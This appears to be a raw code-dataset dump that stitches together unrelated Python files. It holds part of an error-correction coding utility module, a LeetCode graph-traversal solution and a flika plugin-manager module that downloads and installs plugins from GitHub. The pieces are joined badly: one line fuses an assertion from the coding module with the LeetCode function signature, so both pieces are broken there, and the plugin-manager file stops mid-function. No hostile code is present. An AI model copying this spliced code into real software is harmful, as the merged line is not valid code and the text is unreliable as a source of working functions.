equations can be found in [tenBrink]_ and\n [tenBrinkEXIT]_.\n\n Input\n -----\n pcm : ndarray\n The parity-check matrix.\n\n ebno_db : float\n The channel SNR in dB.\n\n Output\n ------\n mi_a : ndarray of floats\n NumPy array containing the `a priori` mutual information.\n\n mi_ev : ndarray of floats\n NumPy array containing the extrinsic mutual information of the\n variable node decoder for the corresponding ``mi_a``.\n\n mi_ec : ndarray of floats\n NumPy array containing the extrinsic mutual information of the check\n node decoder for the corresponding ``mi_a``.\n\n Note\n ----\n This function assumes random parity-check matrices without any imposed\n structure. Thus, explicit code construction algorithms may lead\n to inaccurate EXIT predictions. Further, this function is based\n on asymptotic properties of the code, i.e., only works well for large\n parity-check matrices. For details see [tenBrink]_.\n \"\"\"\n\n # calc coderate\n n = pcm.shape[1]\n k = n - pcm.shape[0]\n coderate = k/n\n\n # calc mean and noise_var of Gaussian distributed LLRs for given channel SNR\n ebno = 10**(ebno_db/10)\n snr = ebno*coderate\n noise_var = 1/(2*snr)\n\n # For BiAWGN channels the LLRs follow a Gaussian distr. as given below [1]\n sigma_llr = np.sqrt(4 / noise_var)\n mu_llr = sigma_llr**2 / 2\n\n # calculate max node degree\n # \"+1\" as the array indices later directly denote the node degrees and we\n # have to account the array start at position 0 (i.e., we need one more\n # element)\n c_max = int(np.max(np.sum(pcm, axis=1)) + 1 )\n v_max = int(np.max(np.sum(pcm, axis=0)) + 1 )\n\n # calculate degree profile (node perspective)\n c = np.histogram(np.sum(pcm, axis=1),\n bins=c_max,\n range=(0, c_max),\n density=False)[0]\n\n v = np.histogram(np.sum(pcm, axis=0),\n bins=v_max,\n range=(0, v_max),\n density=False)[0]\n\n # calculate degrees from edge perspective\n r = np.zeros([c_max])\n for i in range(1,c_max):\n r[i] = (i-1)*c[i]\n r = r / np.sum(r)\n l = np.zeros([v_max])\n for i in range(1,v_max):\n l[i] = (i-1)*v[i]\n l = l / np.sum(l)\n\n mi_a = np.arange(0.002, 0.998, 0.001) # quantize Ia with 0.01 resolution\n\n # Exit function of check node update\n mi_ec = np.zeros_like(mi_a)\n for i in range(1, c_max):\n mi_ec += r[i] * j_fun((i-1.) * j_fun_inv(1 - mi_a))\n mi_ec = 1 - mi_ec\n\n # Exit function of variable node update\n mi_ev = np.zeros_like(mi_a)\n for i in range(1, v_max):\n mi_ev += l[i] * j_fun(mu_llr + (i-1.) * j_fun_inv(mi_a))\n\n return mi_a, mi_ev, mi_ec\n\ndef load_parity_check_examples(pcm_id, verbose=False):\n # pylint: disable=line-too-long\n \"\"\"Utility function to load example codes stored in sub-folder LDPC/codes.\n\n The following codes are available\n\n - 0 : `(7,4)`-Hamming code of length `k=4` information bits and codeword length `n=7`.\n\n - 1 : `(63,45)`-BCH code of length `k=45` information bits and codeword length `n=63`.\n\n - 2 : (127,106)-BCH code of length `k=106` information bits and codeword length `n=127`.\n\n - 3 : Random LDPC code with regular variable node degree 3 and check node degree 6 of length `k=50` information bits and codeword length `n=100`.\n\n - 4 : 802.11n LDPC code of length of length `k=324` information bits and codeword length `n=648`.\n\n Input\n -----\n pcm_id : int\n An integer defining which matrix id to load.\n\n verbose : bool\n Defaults to False. If True, the code parameters are\n printed.\n\n Output\n ------\n pcm: ndarray of `zeros` and `ones`\n An ndarray containing the parity check matrix.\n\n k : int\n An integer defining the number of information bits.\n\n n : int\n An integer defining the number of codeword bits.\n\n coderate : float\n A float defining the coderate (assuming full rank of\n parity-check matrix).\n \"\"\"\n\n source = files(codes).joinpath(\"example_codes.npy\")\n with as_file(source) as code:\n pcms = np.load(code, allow_pickle=True)\n\n pcm = np.array(pcms[pcm_id]) # load parity-check matrix\n n = int(pcm.shape[1]) # number of codeword bits (codeword length)\n k = int(n - pcm.shape[0]) # number of information bits k per codeword\n coderate = k / n\n\n if verbose:\n print(f\"\\nn: {n}, k: {k}, coderate: {coderate:.3f}\")\n return pcm, k, n, coderate\n\ndef bin2int(arr):\n \"\"\"Convert binary array to integer.\n\n For example ``arr`` = `[1, 0, 1]` is converted to `5`.\n\n Input\n -----\n arr: int or float\n An iterable that yields 0's and 1's.\n\n Output\n -----\n : int\n Integer representation of ``arr``.\n\n \"\"\"\n if len(arr) == 0: return None\n return int(''.join([str(x) for x in arr]), 2)\n\ndef bin2int_tf(arr):\n \"\"\"\n Converts binary tensor to int tensor. Binary representation in ``arr``\n is across the last dimension from most significant to least significant.\n\n For example ``arr`` = `[0, 1, 1]` is converted to `3`.\n\n Input\n -----\n arr: int or float\n Tensor of 0's and 1's.\n\n Output\n -----\n : int\n Tensor containing the integer representation of ``arr``.\n \"\"\"\n len_ = tf.shape(arr)[-1]\n shifts = tf.range(len_-1,-1,-1)\n\n # (2**len_-1)*arr[0] +... 2*arr[len_-2] + 1*arr[len_-1]\n op = tf.reduce_sum(tf.bitwise.left_shift(arr, shifts), axis=-1)\n\n return op\n\ndef int2bin(num, len_):\n \"\"\"\n Convert ``num`` of int type to list of length ``len_`` with 0's and 1's.\n ``num`` and ``len_`` have to non-negative.\n\n For e.g., ``num`` = `5`; `int2bin(num`, ``len_`` =4) = `[0, 1, 0, 1]`.\n\n For e.g., ``num`` = `12`; `int2bin(num`, ``len_`` =3) = `[1, 0, 0]`.\n\n Input\n -----\n num: int\n An integer to be converted into binary representation.\n\n len_: int\n An integer defining the length of the desired output.\n\n Output\n -----\n : list of int\n Binary representation of ``num`` of length ``len_``.\n \"\"\"\n assert num >= 0, \"Input integer should be non-negative\"\n assert len_ >= 0, \"width should be non-negative\"\n\n bin_ = format(num, f'0{len_}b')\n binary_vals = [int(x) for x in bin_[-len_:]] if len_ else []\n return binary_vals\n\ndef int2bin_tf(ints, len_):\n \"\"\"\n Converts (int) tensor to (int) tensor with 0's and 1's. `len_` should be\n to non-negative. Additional dimension of size `len_` is inserted at end.\n\n Input\n -----\n ints: int\n Tensor of arbitrary shape `[...,k]` containing integer to be\n converted into binary representation.\n\n len_: int\n An integer defining the length of the desired output.\n\n Output\n -----\n : int\n Tensor of same shape as ``ints`` except dimension of length\n ``len_`` is added at the end `[...,k, len_]`. Contains the binary\n representation of ``ints`` of length ``len_``.\n \"\"\"\n assert len_ >= 0\n\n shifts = tf.range(len_-1, -1, delta=-1)\n bits = tf.math.floormod(\n tf.bitwise.right_shift(tf.expand_dims(ints, -1), shifts), 2)\n return bits\n\ndef alist2mat(alist, verbose=True):\n # pylint: disable=line-too-long\n r\"\"\"Convert `alist` [MacKay]_ code definition to `full` parity-check matrix.\n\n Many code examples can be found in [UniKL]_.\n\n About `alist` (see [MacKay]_ for details):\n\n - `1.` Row defines parity-check matrix dimension `m x n`\n - `2.` Row defines int with `max_CN_degree`, `max_VN_degree`\n - `3.` Row defines VN degree of all `n` column\n - `4.` Row defines CN degree of all `m` rows\n - Next `n` rows contain non-zero entries of each column (can be zero padded at the end)\n - Next `m` rows contain non-zero entries of each row.\n\n Input\n -----\n alist: list\n Nested list in `alist`-format [MacKay]_.\n\n verbose: bool\n Defaults to True. If True, the code parameters are printed.\n\n Output\n ------\n (pcm, k, n, coderate):\n Tuple:\n\n pcm: ndarray\n NumPy array of shape `[n-k, n]` containing the parity-check matrix.\n\n k: int\n Number of information bits.\n\n n: int\n Number of codewords bits.\n\n coderate: float\n Coderate of the code.\n\n Note\n ----\n Use :class:`~sionna.fec.utils.load_alist` to import alist from a\n textfile.\n\n For example, the following code snippet will import an alist from a file called ``filename``:\n\n .. code-block:: python\n\n al = load_alist(path = filename)\n pcm, k, n, coderate = alist2mat(al)\n \"\"\"\n\n assert len(alist)>4, \"Invalid alist format.\"\n\n n = alist[0][0]\n m = alist[0][1]\n v_max = alist[1][0]\n c_max = alist[1][1]\n k = n - m\n coderate = k / n\n\n vn_profile = alist[2]\n cn_profile = alist[3]\n\n # plausibility checks\n assert np.sum(vn_profile)==np.sum(cn_profile), \"Invalid alist format.\"\n assert np.max(vn_profile)==v_max, \"Invalid alist format.\"\n assert np.max(cn_profile)==c_max, \"Invalid alist format.\"\n\n if len(alist)==len(vn_profile)+4:\n print(\"Note: .alist does not contain (redundant) CN perspective.\")\n print(\"Recovering parity-check matrix from VN only.\")\n print(\"Please verify the correctness of the results manually.\")\n vn_only = True\n else:\n assert len(alist)==len(vn_profile) + len(cn_profile) + 4, \\\n \"Invalid alist format.\"\n vn_only = False\n\n pcm = np.zeros((m,n))\n num_edges = 0 # count number of edges\n\n for idx_v in range(n):\n for idx_i in range(vn_profile[idx_v]):\n # first 4 rows of alist contain meta information\n idx_c = alist[4+idx_v][idx_i]-1 # \"-1\" as this is python\n pcm[idx_c, idx_v] = 1\n num_edges += 1 # count number of edges (=each non-zero entry)\n\n # validate results from CN perspective\n if not vn_only:\n for idx_c in range(m):\n for idx_i in range(cn_profile[idx_c]):\n # first 4 rows of alist contain meta information\n # follwing n rows contained VN perspective\n idx_v = alist[4+n+idx_c][idx_i]-1 # \"-1\" as this is python\n assert pcm[idx_c, idx_v]==1 # entry must already exist\n\n if verbose:\n print(\"Number of variable nodes (columns): \", n)\n print(\"Number of check nodes (rows): \", m)\n print(\"Number of information bits per cw: \", k)\n print(\"Number edges: \", num_edges)\n print(\"Max. VN degree: \", v_max)\n print(\"Max. CN degree: \", c_max)\n print(\"VN degree: \", vn_profile)\n print(\"CN degree: \", cn_profile)\n\n return pcm, k, n, coderate\n\ndef load_alist(path):\n \"\"\"Read `alist`-file [MacKay]_ and return nested list describing the\n parity-check matrix of a code.\n\n Many code examples can be found in [UniKL]_.\n\n Input\n -----\n path:str\n Path to file to be loaded.\n\n Output\n ------\n alist: list\n A nested list containing the imported alist data.\n \"\"\"\n\n alist = []\n with open(path, \"r\") as reader: # pylint: disable=unspecified-encoding\n # read list line by line (different length)\n for line in reader:\n l = []\n # append all entries\n for word in line.split():\n l.append(int(word))\n if l: # ignore empty lines\n alist.append(l)\n\n return alist\n\ndef make_systematic(mat, is_pcm=False):\n r\"\"\"Bring binary matrix in its systematic form.\n\n Input\n -----\n mat : ndarray\n Binary matrix to be transformed to systematic form of shape `[k, n]`.\n\n is_pcm: bool\n Defaults to False. If true, ``mat`` is interpreted as parity-check\n matrix and, thus, the last k columns will be the identity part.\n\n Output\n ------\n mat_sys: ndarray\n Binary matrix in systematic form, i.e., the first `k` columns equal the\n identity matrix (or last `k` if ``is_pcm`` is True).\n\n column_swaps: list of int tuples\n A list of integer tuples that describes the swapped columns (in the\n order of execution).\n\n Note\n ----\n This algorithm (potentially) swaps columns of the input matrix. Thus, the\n resulting systematic matrix (potentially) relates to a permuted version of\n the code, this is defined by the returned list ``column_swap``.\n Note that, the inverse permutation must be applied in the inverse list\n order (in case specific columns are swapped multiple times).\n\n If a parity-check matrix is passed as input (i.e., ``is_pcm`` is True), the\n identity part will be re-arranged to the last columns.\"\"\"\n\n m = mat.shape[0]\n n = mat.shape[1]\n\n assert m<=n, \"Invalid matrix dimensions.\"\n\n # check for all-zero columns (=unchecked nodes)\n if is_pcm:\n c_node_deg = np.sum(mat, axis=0)\n if np.any(c_node_deg==0):\n warnings.warn(\"All-zero column in parity-check matrix detected. \" \\\n \"It seems as if the code contains unprotected nodes.\")\n\n mat = np.copy(mat)\n column_swaps = [] # store all column swaps\n\n # convert to bool for faster arithmetics\n mat = mat.astype(bool)\n\n # bring in upper triangular form\n for idx_c in range(m):\n success = False\n # step 1: find next leading \"1\"\n for idx_r in range(idx_c,m):\n # skip if entry is \"0\"\n if mat[idx_r, idx_c]:\n mat[[idx_c, idx_r]] = mat[[idx_r, idx_c]] # swap rows\n success = True\n break\n\n # Could not find \"1\"-entry for column idx_c\n # => swap with columns from non-sys part\n # The task is to find a column with index idx_cc that has a \"1\" at\n # row idx_c\n if not success:\n for idx_cc in range(m, n):\n if mat[idx_c, idx_cc]:\n # swap columns\n mat[:,[idx_c, idx_cc]] = mat[:,[idx_cc, idx_c]]\n column_swaps.append([idx_c, idx_cc])\n success=True\n break\n\n if not success:\n raise ValueError(\"Could not succeed; mat is not full rank?\")\n\n # we can now assume a leading \"1\" at row idx_c\n for idx_r in range(idx_c+1, m):\n if mat[idx_r, idx_c]:\n mat[idx_r,:] ^= mat[idx_c,:] # bin. add of row idx_c to idx_r\n\n # remove upper triangle part in inverse order\n for idx_c in range(m-1, -1, -1):\n for idx_r in range(idx_c-1, -1, -1):\n if mat[idx_r, idx_c]:\n mat[idx_r,:] ^= mat[idx_c,:] # bin. add of row idx_c to idx_r\n\n # verify results\n assert np.array_equal(mat[:,:m], np.eye(m)), \\\n \"Internal error, could not find systematic matrix.\"\n\n # bring identity part to end of matrix if parity-check matrix is provided\n if is_pcm:\n im = np.copy(mat[:,:m])\n mat[:,:m] = mat[:,-m:]\n mat[:,-m:] = im\n # and track column swaps\n for idx in range(m):\n column_swaps.append([idx, n-m+idx])\n\n # return integer array\n mat = mat.astype(int)\n return mat, column_swaps\n\ndef gm2pcm(gm, verify_results=True):\n r\"\"\"Generate the parity-check matrix for a given generator matrix.\n\n This function brings ``gm`` :math:`\\mathbf{G}` in its systematic form and\n uses the following relation to find the parity-check matrix\n :math:`\\mathbf{H}` in GF(2)\n\n .. math::\n\n \\mathbf{G} = [\\mathbf{I} | \\mathbf{M}]\n \\Leftrightarrow \\mathbf{H} = [\\mathbf{M} ^t | \\mathbf{I}]. \\tag{1}\n\n This follows from the fact that for an all-zero syndrome, it must hold that\n\n .. math::\n\n \\mathbf{H} \\mathbf{c}^t = \\mathbf{H} * (\\mathbf{u} * \\mathbf{G})^t =\n \\mathbf{H} * \\mathbf{G} ^t * \\mathbf{u}^t =: \\mathbf{0}\n\n where :math:`\\mathbf{c}` denotes an arbitrary codeword and\n :math:`\\mathbf{u}` the corresponding information bits.\n\n This leads to\n\n .. math::\n\n \\mathbf{G} * \\mathbf{H} ^t =: \\mathbf{0}. \\tag{2}\n\n It can be seen that (1) fulfills (2), as it holds in GF(2) that\n\n .. math::\n\n [\\mathbf{I} | \\mathbf{M}] * [\\mathbf{M} ^t | \\mathbf{I}]^t\n = \\mathbf{M} + \\mathbf{M} = \\mathbf{0}.\n\n Input\n -----\n gm : ndarray\n Binary generator matrix of shape `[k, n]`.\n\n verify_results: bool\n Defaults to True. If True, it is verified that the generated\n parity-check matrix is orthogonal to the generator matrix in GF(2).\n\n Output\n ------\n : ndarray\n Binary parity-check matrix of shape `[n-k, n]`.\n\n Note\n ----\n This algorithm only works if ``gm`` has full rank. Otherwise an error is\n raised.\n\n \"\"\"\n k = gm.shape[0]\n n = gm.shape[1]\n\n assert k int:\n n = len(isConnected)\n visited = [False]*n\n \n def traverse(i):\n visited[i] = True\n for j in range(n):\n if isConnected[i][j] == 1 and not visited[j]:\n traverse(j)\n\n cnt = 0\n for i in range(n):\n if not visited[i]:\n cnt += 1\n traverse(i)\n return cnt\n\n# class Solution:\n# def findCircleNum(self, isConnected: List[List[int]]) -> int:\n# n = len(isConnected)\n# # -1 : unvisited, 0 : first province, 1 : second province etc.\n# cities = [-1]*n\n \n# def traverse(i, maxGroup):\n# cities[i] = maxGroup\n# for j in range(n):\n# if isConnected[i][j] == 1 and cities[j] == -1:\n# traverse(j, maxGroup)\n\n# maxGroup = -1\n# for i in range(n):\n# if cities[i] != -1:\n# continue\n# maxGroup += 1\n# traverse(i, maxGroup)\n# return maxGroup+1\n\nif __name__ == '__main__':\n sol = Solution()\n isConnected = [[1,1,0],[1,1,0],[0,0,1]]\n print(sol.findCircleNum(isConnected))","repo_name":"LiaoU3/LeetCode","sub_path":"Problems/547_Number_of_Provinces.py","file_name":"547_Number_of_Provinces.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31711076582","text":"# -*- coding: utf-8 -*-\nfrom ..logger import logger\nlogger.debug(\"Started 'reading app/plugin_manager.py'\")\n\nfrom glob import glob\nimport os, sys, difflib, zipfile, time, shutil, traceback, subprocess\nfrom os.path import expanduser\nfrom qtpy import QtGui, QtWidgets, QtCore\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.parse import urljoin\nimport threading\nimport tempfile\nfrom xml.etree import ElementTree\nimport platform\nimport pkg_resources\n\nfrom .. import global_vars as g\nfrom ..utils.misc import load_ui\nfrom ..images import image_path\n\nplugin_list = {\n 'Beam Splitter': 'https://raw.githubusercontent.com/BrettJSettle/BeamSplitter/master/',\n 'Detect Puffs': 'https://raw.githubusercontent.com/kyleellefsen/detect_puffs/master/',\n 'Global Analysis': 'https://raw.githubusercontent.com/BrettJSettle/GlobalAnalysisPlugin/master/',\n 'Pynsight': 'http://raw.githubusercontent.com/kyleellefsen/pynsight/master/',\n 'QuantiMus': 'http://raw.githubusercontent.com/Quantimus/quantimus/master/',\n 'Rodent Tracker': 'https://raw.githubusercontent.com/kyleellefsen/rodentTracker/master/'\n}\n\nhelpHTML = '''\n

    Welcome to the flika Plugin Manager

    \n

    Use the search bar to the left to find a specific plugin, or browse the list below it.

    \n\n
    \n

    Develop a new plugin

    \n

    If you would like to develop your own plugin for flika, follow these simple steps:

    \n
      \n
    • 1. Download flika Plugin Template and place it in your .FLIKA/plugins directory
    • \n
    • 2. Update the info.xml file for your plugin
    • \n
    • 3. Refer to the flika Documentation for assistance developing your plugin.
    • \n
    • 4. Update the description.html file for your plugin
    • \n
    • 5. Send your plugin repo to us and we'll add it to the Plugin Manager!
    • \n
    \n
    \n'''\n\n\ndef get_plugin_directory():\n logger.debug('Calling app.plugin_manager.get_plugin_directory')\n local_flika_directory = os.path.join(expanduser(\"~\"), '.FLIKA')\n plugin_directory = os.path.join(expanduser(\"~\"), '.FLIKA', 'plugins' )\n if not os.path.exists(plugin_directory):\n os.makedirs(plugin_directory)\n if not os.path.isfile(os.path.join(plugin_directory, '__init__.py')):\n open(os.path.join(plugin_directory, '__init__.py'), 'a').close() # Create empty __init__.py file\n if plugin_directory not in sys.path:\n sys.path.append(plugin_directory)\n if local_flika_directory not in sys.path:\n sys.path.append(local_flika_directory)\n return plugin_directory\n\nplugin_dir = get_plugin_directory()\n\n\ndef parse(x):\n #logger.debug('Calling app.plugin_manager.parse')\n tree = ElementTree.fromstring(x)\n def step(item):\n d = {}\n if item.text and item.text.strip():\n d['#text'] = item.text.strip()\n for k, v in item.items():\n d['@%s' % k] = v\n for k in list(item):\n if k.tag not in d:\n d[k.tag] = step(k)\n elif type(d[k.tag]) == list:\n d[k.tag].append(step(k))\n else:\n d[k.tag] = [d[k.tag], step(k)]\n if len(d) == 1 and '#text' in d:\n return d['#text']\n return d\n return step(tree)\n\n\ndef str2func(plugin_name, file_location, function):\n '''\n takes plugin_name, path to object, function as arguments\n imports plugin_name.path and gets the function from that imported object\n to be run when an action is clicked\n '''\n #logger.debug(\"Started 'app.plugin_manager.str2func({}, {}, {})'\".format(plugin_name, file_location, function))\n __import__(plugin_name)\n plugin_dir = \"plugins.{}.{}\".format(plugin_name, file_location)\n levels = function.split('.')\n module = __import__(plugin_dir, fromlist=[levels[0]]).__dict__[levels[0]]\n for i in range(1, len(levels)):\n module = getattr(module, levels[i])\n #logger.debug(\"Completed 'app.plugin_manager.str2func({}, {}, {})'\".format(plugin_name, file_location, function))\n return module\n\n\ndef fake_str2func(plugin_name, file_location, function):\n def fake_fun():\n print(str(function))\n print('yay')\n return fake_fun\n\ndef build_submenu(module_name, parent_menu, layout_dict):\n #logger.debug('Calling app.plugin_manager.build_submenu')\n if len(layout_dict) == 0:\n g.alert(\"Error building submenu for the plugin '{}'. No items found in 'menu_layout' in the info.xml file.\".format(module_name))\n for key, value in layout_dict.items():\n if type(value) != list:\n value = [value]\n if key == 'menu':\n for v in value:\n menu = parent_menu.addMenu(v[\"@name\"])\n build_submenu(module_name, menu, v)\n elif key == 'action':\n for od in value:\n method = str2func(module_name, od['@location'], od['@function'])\n if method is not None:\n action = QtWidgets.QAction(od['#text'], parent_menu, triggered = method)\n parent_menu.addAction(action)\n\n\nclass Plugin():\n def __init__(self, name=None, info_url=None):\n self.name = name\n self.directory = None\n self.url = None\n self.author = None\n self.documentation = None\n self.version = ''\n self.latest_version = ''\n self.menu = None\n self.listWidget = QtWidgets.QListWidgetItem(self.name)\n self.installed = False\n self.description = ''\n self.dependencies = []\n self.loaded = False\n self.info_url = info_url\n if info_url:\n self.update_info()\n\n def lastModified(self):\n return os.path.getmtime(os.path.join(plugin_dir, self.directory))\n\n def fromLocal(self, path):\n #logger.debug('Calling app.plugin_manager.Plugin.fromLocal')\n with open(os.path.join(path, 'info.xml'), 'r') as f:\n text = f.read()\n info = parse(text)\n self.name = info['@name']\n self.directory = info['directory']\n self.version = info['version']\n self.latest_version = self.version\n self.author = info['author']\n with open(os.path.join(path, 'about.html'), 'r') as f:\n try:\n self.description = str(f.read())\n except FileNotFoundError:\n self.description = \"No local description file found\"\n self.url = info['url'] if 'url' in info else None\n self.documentation = info['documentation'] if 'documentation' in info else None\n if 'dependencies' in info and 'dependency' in info['dependencies']:\n deps = info['dependencies']['dependency']\n self.dependencies = [d['@name'] for d in deps] if isinstance(deps, list) else [deps['@name']]\n self.menu_layout = info.pop('menu_layout')\n self.listWidget = QtWidgets.QListWidgetItem(self.name)\n self.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n self.loaded = True\n\n def bind_menu_and_methods(self):\n if len(self.menu_layout) > 0:\n self.menu = QtWidgets.QMenu(self.name)\n build_submenu(self.directory, self.menu, self.menu_layout)\n else:\n self.menu = None\n\n\n def update_info(self):\n logger.debug('Calling app.plugin_manager.update_info')\n if self.info_url is None:\n return False\n info_url = urljoin(self.info_url, 'info.xml')\n try:\n txt = urlopen(info_url).read()\n except HTTPError as e:\n g.alert(\"Failed to update information for {}.\\n\\t{}\".format(self.name, e))\n return\n\n new_info = parse(txt)\n description_url = urljoin(self.info_url, 'about.html')\n try:\n new_info['description'] = urlopen(description_url).read().decode('utf-8')\n except HTTPError:\n new_info['description'] = \"Unable to get description for {0} from {1}\".format(self.name, description_url)\n self.menu_layout = new_info.pop('menu_layout')\n if 'date' in new_info:\n new_info['version'] = '.'.join(new_info['date'].split('/')[2:] + new_info['date'].split('/')[:2])\n new_info.pop('date')\n new_info['latest_version'] = new_info.pop('version')\n if 'dependencies' in new_info and 'dependency' in new_info['dependencies']:\n deps = new_info.pop('dependencies')['dependency']\n self.dependencies = [d['@name'] for d in deps] if isinstance(deps, list) else [deps['@name']]\n self.__dict__.update(new_info)\n self.loaded = True\n \n\nclass PluginManager(QtWidgets.QMainWindow):\n plugins = {}\n loadThread = None\n sigPluginLoaded = QtCore.Signal(str)\n '''\n PluginManager handles installed plugins and the online plugin database\n | show() : initializes a gui as a static variable of the class, if necessary, and displays it. Call in place of constructor\n | close() : closes the gui if it exists\n '''\n @staticmethod\n def show():\n logger.debug('Calling app.plugin_manager.PluginManager.show')\n if not hasattr(PluginManager, 'gui'):\n PluginManager.gui = PluginManager()\n PluginManager.gui.showPlugins()\n #PluginManager.load_online_plugins()\n QtWidgets.QMainWindow.show(PluginManager.gui)\n if not os.access(plugin_dir, os.W_OK):\n g.alert(\"Plugin folder write permission denied. Restart flika as administrator to enable plugin installation.\")\n\n PluginManager.gui.showHelpScreen()\n\n\n @staticmethod\n def refresh_online_plugins():\n logger.debug('Calling app.plugin_manager.PluginManager.refresh_online_plugins()')\n for p in plugin_list.keys():\n PluginManager.load_online_plugin(p)\n\n @staticmethod\n def load_online_plugin(p):\n logger.debug('Calling app.plugin_manager.PluginManager.load_online_plugin()')\n if p not in plugin_list or PluginManager.loadThread is not None and PluginManager.loadThread.is_alive():\n return\n def loadThread():\n plug = PluginManager.plugins[p]\n plug.info_url = plugin_list[p]\n plug.update_info()\n PluginManager.gui.sigPluginLoaded.emit(p)\n #PluginManager.gui.statusBar.showMessage('Plugin information loaded successfully')\n\n PluginManager.loadThread = threading.Thread(None, loadThread)\n PluginManager.gui.statusBar.showMessage('Loading plugin information for {}...'.format(p))\n PluginManager.loadThread.start()\n\n def closeEvent(self, ev):\n if self.loadThread is not None and self.loadThread.is_alive():\n self.loadThread.join(0)\n\n @staticmethod\n def close():\n if hasattr(PluginManager, 'gui'):\n QtWidgets.QMainWindow.close(PluginManager.gui)\n\n def __init__(self):\n logger.debug('Calling app.plugin_manager.PluginManager.load_online_plugin()')\n\n super(PluginManager,self).__init__()\n load_ui(\"plugin_manager.ui\", self, directory=os.path.dirname(__file__))\n try:\n self.scrollAreaWidgetContents.setContentsMargins(10, 10, 10, 10)\n except:\n pass\n #self.pluginList.itemClicked.connect(self.pluginSelected)\n self.tutorialButton.clicked.connect(lambda : QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"https://github.com/flika-org/flika_plugin_template\")))\n self.open_plugins_directory_button.clicked.connect(lambda: QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"file:///\" + os.path.expanduser('~/.FLIKA/plugins/'))))\n\n self.downloadButton.clicked.connect(self.downloadClicked)\n self.pluginList.currentItemChanged.connect(lambda new, old: self.pluginSelected(new))\n self.documentationButton.clicked.connect(self.documentationClicked)\n self.updateButton.clicked.connect(self.updateClicked)\n \n self.searchBox.textChanged.connect(self.showPlugins)\n self.searchButton.clicked.connect(lambda f: self.showPlugins(search_str=str(self.searchBox.text())))\n self.descriptionLabel.setOpenExternalLinks(True)\n \n self.refreshButton.pressed.connect(self.refresh_online_plugins)\n def updatePlugin(a):\n self.statusBar.showMessage(\"Finished loading {}\".format(a))\n if PluginManager.plugins[a].listWidget.isSelected():\n PluginManager.gui.pluginSelected(a)\n #else:\n #self.showPlugins()\n self.sigPluginLoaded.connect(updatePlugin)\n\n self.setWindowTitle('Plugin Manager')\n self.showPlugins()\n\n def showHelpScreen(self):\n self.pluginLabel.setText(\"\")\n self.descriptionLabel.setHtml(helpHTML)\n self.downloadButton.setVisible(False)\n self.documentationButton.setVisible(False)\n self.updateButton.setVisible(False)\n self.infoLabel.setText(\"\")\n\n def downloadClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n if self.downloadButton.text() == 'Install':\n PluginManager.downloadPlugin(plugin)\n else:\n PluginManager.removePlugin(plugin)\n\n def documentationClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n if hasattr(plugin, \"documentation\"):\n QtGui.QDesktopServices.openUrl(QtCore.QUrl(plugin.documentation))\n\n def updateClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n PluginManager.removePlugin(plugin)\n PluginManager.downloadPlugin(plugin)\n\n def pluginSelected(self, item):\n from pkg_resources import parse_version\n logger.debug('Calling app.plugin_manager.PluginManager.pluginSelected()')\n if item is None:\n if self.pluginLabel.text():\n self.pluginSelected(PluginManager.plugins[self.pluginLabel.text()].listWidget)\n return\n if isinstance(item, str):\n s = item\n else:\n s = str(item.text())\n plugin = self.plugins[s]\n self.pluginLabel.setText(s)\n if not plugin.loaded:\n info = \"Loading information\"\n else:\n info = 'By {}, Latest: {}'.format(plugin.author, plugin.latest_version)\n self.downloadButton.setVisible(True)\n version = parse_version(plugin.version)\n latest_version = parse_version(plugin.latest_version)\n if plugin.version and version < latest_version:\n info += \"; Update Available!\"\n\n self.updateButton.setVisible(plugin.version != '' and version < latest_version)\n self.downloadButton.setText(\"Install\" if plugin.version == '' else 'Uninstall')\n self.documentationButton.setVisible(plugin.documentation != None)\n if plugin.version == '':\n plugin.listWidget.setIcon(QtGui.QIcon())\n elif parse_version(plugin.version) < parse_version(plugin.latest_version):\n plugin.listWidget.setIcon(QtGui.QIcon(image_path('exclamation.png')))\n else:\n plugin.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n\n self.infoLabel.setText(info)\n self.descriptionLabel.setHtml(plugin.description)\n if plugin.info_url == None:\n self.load_online_plugin(plugin.name)\n\n @staticmethod\n def local_plugin_paths():\n paths = []\n for path in glob(os.path.join(plugin_dir, \"*\")):\n if os.path.isdir(path) and os.path.exists(os.path.join(path, 'info.xml')):\n paths.append(path)\n return paths\n\n def clearList(self):\n while self.pluginList.count() > 0:\n self.pluginList.takeItem(0)\n\n def showPlugins(self, search_str=None):\n from pkg_resources import parse_version\n self.clearList()\n if search_str == None or len(search_str) == 0:\n names = sorted(self.plugins.keys())\n else:\n def sort_func(name):\n name = str(name)\n return -difflib.SequenceMatcher(None, name.lower(), search_str.lower()).ratio() - int(search_str.lower() in name.lower())\n d = {name: sort_func(name) for name in self.plugins.keys() if sort_func(name) != 0}\n names = sorted(d.keys(), key=lambda a: d[a])\n for name in names:\n plug = PluginManager.plugins[name]\n if plug.version == '':\n plug.listWidget.setIcon(QtGui.QIcon())\n elif parse_version(plug.version) < parse_version(plug.latest_version):\n plug.listWidget.setIcon(QtGui.QIcon(image_path('exclamation.png')))\n else:\n plug.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n self.pluginList.addItem(plug.listWidget)\n\n @staticmethod\n def removePlugin(plugin):\n PluginManager.gui.statusBar.showMessage(\"Uninstalling {}\".format(plugin.name))\n if os.path.isdir(os.path.join(plugin_dir, plugin.directory, '.git')):\n g.alert(\"This plugin's directory is managed by git. To remove, manually delete the directory\")\n return False\n try:\n shutil.rmtree(os.path.join(plugin_dir, plugin.directory), ignore_errors=True)\n plugin.version = ''\n plugin.menu = None\n plugin.listWidget.setIcon(QtGui.QIcon())\n PluginManager.gui.statusBar.showMessage('{} successfully uninstalled'.format(plugin.name))\n except Exception as e:\n g.alert(title=\"Plugin Uninstall Failed\", msg=\"Unable to remove the folder at %s\\n%s\\nDelete the folder manually to uninstall the plugin\" % (plugin.name, e), icon=QtWidgets.QMessageBox.Warning)\n\n PluginManager.gui.pluginSelected(plugin.listWidget)\n plugin.installed = False\n\n @staticmethod\n def downloadPlugin(plugin):\n PluginManager.gui.statusBar.showMessage(\"Installing 